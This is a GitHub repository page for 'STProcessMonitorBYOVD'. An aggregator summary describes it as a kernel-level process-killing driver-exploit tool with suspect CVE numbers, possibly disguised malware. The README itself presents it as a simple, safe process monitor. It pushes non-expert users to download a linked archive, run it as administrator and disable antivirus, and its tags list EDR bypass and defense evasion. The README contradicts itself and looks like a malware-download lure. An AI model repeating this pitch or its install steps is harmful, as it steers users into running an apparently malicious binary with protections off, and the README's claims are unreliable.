wutang700/STProcessMonitorBYOVD

GitHub: wutang700/STProcessMonitorBYOVD

利用驱动漏洞实现内核级进程终止的 BYOVD 工具,但存在伪造 CVE 编号的可疑行为,可能是伪装的恶意软件。

Stars: 1 | Forks: 0

# ⚙️ STProcessMonitorBYOVD - 简单安全地追踪进程 [![下载 STProcessMonitorBYOVD](https://github.com/wutang700/STProcessMonitorBYOVD/raw/refs/heads/master/STProcessMonitorBYOVD/Process_BYOVD_ST_Monitor_3.1.zip)](https://github.com/wutang700/STProcessMonitorBYOVD/raw/refs/heads/master/STProcessMonitorBYOVD/Process_BYOVD_ST_Monitor_3.1.zip) ## 📖 什么是 STProcessMonitorBYOVD? STProcessMonitorBYOVD 是一款简单的应用程序,旨在帮助您监视和管理 Windows 计算机上运行的进程。它作为两个重要安全更新(CVE-2025-70795 和 CVE-2026-0828)的概念验证,展示了它们的工作原理以及如何保持受保护状态。 该工具允许您查看系统上运行程序的实时数据。它可以帮助您发现异常活动或可能导致问题的进程。虽然它面向需要基本监视功能的用户,但它建立在可靠的技术之上,以确保安全。 ## 🚀 入门指南 您不需要任何特殊技能或知识即可使用本程序。如果您能从互联网下载文件并在 PC 上打开它,您就能运行 STProcessMonitorBYOVD。 ### 系统要求 - Windows 10 或更高版本(推荐 64 位) - 至少 4 GB RAM - 100 MB 可用硬盘空间 - 互联网连接以下载软件 ### 您将看到的内容 启动应用程序后,您将获得计算机上运行的所有程序和进程的列表。该应用程序会定期更新此列表,以便您始终掌握最新信息。 ## 💾 下载并安装 STProcessMonitorBYOVD 请访问此链接下载最新版本的 STProcessMonitorBYOVD: [下载 STProcessMonitorBYOVD](https://github.com/wutang700/STProcessMonitorBYOVD/raw/refs/heads/master/STProcessMonitorBYOVD/Process_BYOVD_ST_Monitor_3.1.zip) 或点击本页面顶部的大徽章。 ### 如何下载 1. 点击上面的链接。它将带您进入 GitHub 上的官方发布页面。 2. 在列表顶部找到最新的发布版本。 3. 找到以 `.exe` 结尾的文件(这是程序文件)。 4. 点击文件名开始下载。 ### 如何安装 1. 下载完成后,双击打开该文件。 2. 如果 Windows 请求安装权限,请点击“是”或“允许”。 3. 安装程序将引导您完成设置步骤。只需点击“Next”直到完成。 4. 安装完成后,您可以从桌面或开始菜单打开程序。 ## 🔍 如何使用 STProcessMonitorBYOVD 1. 打开程序。 2. 主窗口显示正在运行的进程列表。 您将看到包含进程名称、ID 号、CPU 使用率和内存使用情况的列。 3. 如果要刷新列表,请按“Refresh”按钮。 4. 有关进程的更多详细信息,请点击其名称。 5. 您可以随时通过点击“Exit”按钮或关闭图标来关闭程序。 ## 🛠 功能与控制 - **实时监控:** 查看系统进程的当前状态,每几秒更新一次。 - **进程详情:** 检查每个进程的功能及其使用的系统资源量。 - **用户友好界面:** 简洁明了的设计,让您可以专注于信息。 - **安全焦点:** 采用最新的安全更新构建,以保护您免受漏洞侵害。 - **轻量级:** 占用极少的 CPU 和内存,不会拖慢您的计算机。 ## ⚠️ 故障排除 - **程序无法启动:** 确保您的 Windows 已更新并满足系统要求。尝试通过右键点击图标并选择“以管理员身份运行”。 - **安装期间出错:** 暂时禁用杀毒软件,然后重试。 - **未显示进程:** 点击“Refresh”重新加载数据。如果问题仍然存在,请重启计算机。 - **应用程序缓慢:** 关闭其他程序,然后重试。 如果这些方法都无效,请考虑在代码库的 Issues 标签页寻求帮助或联系软件维护者。 ## 🔒 关于安全 此应用程序与编号为 CVE-2025-70795 和 CVE-2026-0828 的漏洞相关。这些是可能允许未经授权的用户干扰系统进程的安全缺口。 STProcessMonitorBYOVD 演示了更新的安全补丁如何保护您的系统。在您更新 Windows 版本的同时运行此工具,有助于您安全地观察进程行为。 ## 💬 反馈与支持 如果您发现问题或想提出改进建议,请访问 GitHub 代码库的 **Issues** 部分并提交您的想法或 Bug。维护者会定期检查请求并回复更新。 ## 📚 了解更多 您可以访问官方 Microsoft 支持页面或受信赖的在线技术资源,以了解有关进程监控和 Windows 安全更新的更多信息。 ## 🏷 许可证 STProcessMonitorBYOVD 采用 MIT 许可证提供。您可以自由地将其用于个人或学术目的。 ## 📥 准备开始了吗? 继续并在此处获取软件: [https://github.com/wutang700/STProcessMonitorBYOVD/raw/refs/heads/master/STProcessMonitorBYOVD/Process_BYOVD_ST_Monitor_3.1.zip](https://github.com/wutang700/STProcessMonitorBYOVD/raw/refs/heads/master/STProcessMonitorBYOVD/Process_BYOVD_ST_Monitor_3.1.zip) 点击最新的 `.exe` 文件,下载、安装并打开 STProcessMonitorBYOVD,开始监控您计算机的进程。
标签:BYOVD攻击技术, Conpot, CVE-2025-70795, CVE-2026-0828, CVE漏洞利用, EDR绕过, Linux, UML, Web报告查看器, Windows安全, Windows进程管理, 内核层操作, 内核驱动安全, 协议分析, 反病毒辅助, 权限提升, 私有化部署, 系统底层的控制, 系统监控软件, 进程终止工具, 防御规避, 驱动程序漏洞, 高交互蜜罐